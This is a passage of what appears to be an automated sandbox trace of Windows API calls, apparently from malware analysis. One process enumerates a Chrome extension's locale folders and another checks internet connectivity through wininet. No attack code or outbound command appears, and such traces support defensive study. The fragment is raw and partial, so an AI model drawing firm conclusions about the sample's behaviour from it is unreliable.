SUCCESS | 0x001734c0 | |
| 07:44:20,274 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\xbf\xe3g\xe0\x91\xcf\x01 \xe7Mi\xe0\x91\xcf\x01\xe0F\xe5g\xe0\x91\xcf\x01\xe0F\xe5g\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0F\xe5g\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\x01\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:20,274 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:20,274 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:20,354 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\bg\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:20,354 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00@U\xe8g\xe0\x91\xcf\x01 \xe7Mi\xe0\x91\xcf\x01p\xdc\xe9g\xe0\x91\xcf\x01p\xdc\xe9g\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p\xdc\xe9g\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\x0b\x01\x00\x00\x00\x00\x00\x00\x10\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:20,354 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:20,354 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:20,434 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\ca\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:20,434 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x000\xf9\xefg\xe0\x91\xcf\x01 \xe7Mi\xe0\x91\xcf\x01\xf0\x15\xf6g\xe0\x91\xcf\x01\xf0\x15\xf6g\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x15\xf6g\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xea\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:20,434 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:20,434 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:20,514 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\cs\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:20,514 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00P$\xf9g\xe0\x91\xcf\x01 \xe7Mi\xe0\x91\xcf\x01@\xc8\x00h\xe0\x91\xcf\x01@\xc8\x00h\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\xc8\x00h\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xe7\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:20,514 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:20,514 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:20,594 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\da\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:20,594 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd0]\x05h\xe0\x91\xcf\x01 \xe7Mi\xe0\x91\xcf\x01\xd0]\x05h\xe0\x91\xcf\x01\xd0]\x05h\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0]\x05h\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xe6\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:20,594 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:20,604 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:20,684 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\de\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:20,684 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x000l\x08h\xe0\x91\xcf\x01 \xe7Mi\xe0\x91\xcf\x01`\xf3 h\xe0\x91\xcf\x01`\xf3 h\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\xf3 h\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xe2\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:20,684 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:20,684 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:20,764 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\el\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:20,764 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xc0\x01 h\xe0\x91\xcf\x01 \xe7Mi\xe0\x91\xcf\x01\xf0\x88\x0eh\xe0\x91\xcf\x01\xf0\x88\x0eh\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x88\x0eh\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\x1b\x01\x00\x00\x00\x00\x00\x00 \x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:20,764 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:20,764 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:20,824 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:20,824 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:20,824 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:20,824 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:20,824 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:20,844 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\en\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:20,844 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\x97\x11h\xe0\x91\xcf\x01 \xe7Mi\xe0\x91\xcf\x01\xe0,\x16h\xe0\x91\xcf\x01\xe0,\x16h\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0,\x16h\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xe3\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:20,844 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:20,844 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:20,925 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\es\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:20,925 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0I\x1ch\xe0\x91\xcf\x01 \xe7Mi\xe0\x91\xcf\x01\x00X\x1fh\xe0\x91\xcf\x01\x00X\x1fh\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\x1fh\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xe8\x00\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:20,925 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:20,925 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:21,005 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\fi\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:21,005 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00`f"h\xe0\x91\xcf\x01 \xe7Mi\xe0\x91\xcf\x01\xf0\xfb&h\xe0\x91\xcf\x01\xf0\xfb&h\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\xfb&h\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xda\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:21,005 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:21,005 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:21,085 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\fil\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:21,085 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x80\x91+h\xe0\x91\xcf\x01 \xe7Mi\xe0\x91\xcf\x01\xe0\x9f.h\xe0\x91\xcf\x01\xe0\x9f.h\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x9f.h\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xec\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:21,085 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:21,085 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:21,165 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\fr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:21,165 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0\xbc4h\xe0\x91\xcf\x01 \xe7Mi\xe0\x91\xcf\x010R9h\xe0\x91\xcf\x010R9h\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000R9h\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xf1\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:21,165 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:21,165 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:21,245 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\he\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:21,245 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0n?h\xe0\x91\xcf\x01\xf0_Li\xe0\x91\xcf\x01\xb0\x8bEh\xe0\x91\xcf\x01\xb0\x8bEh\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb0\x8bEh\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\x07\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:21,245 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:21,245 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:21,405 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\hi\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:21,405 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0/Mh\xe0\x91\xcf\x010CFi\xe0\x91\xcf\x01\x00>Ph\xe0\x91\xcf\x01\x00>Ph\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>Ph\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01)\x01\x00\x00\x00\x00\x00\x000\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:21,405 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:21,405 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:21,485 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\hr\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:21,485 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xe1Wh\xe0\x91\xcf\x010CFi\xe0\x91\xcf\x01\xa0\xa2eh\xe0\x91\xcf\x01\xa0\xa2eh\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa2eh\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xd0\x00\xa5i\xe0\x91\xcf\x01\xdc\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00E\x00S\x00S\x00A\x00G\x00~\x001\x00.\x00J\x00S\x00O\x00m\x00e\x00s\x00s\x00a\x00g\x00e\x00s\x00.\x00j\x00s\x00o\x00n\x00 |
SUCCESS | 0x00000000 | |
| 07:44:21,485 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001cc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:21,485 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:21,565 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\_locales\hu\*.* |
SUCCESS | 0x001734c0 | |
| 07:44:21,565 | 504 | NtQueryDirectoryFile |
